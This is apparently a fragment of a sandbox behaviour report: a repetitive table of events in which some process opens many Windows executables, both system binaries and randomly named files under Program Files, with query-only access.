| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
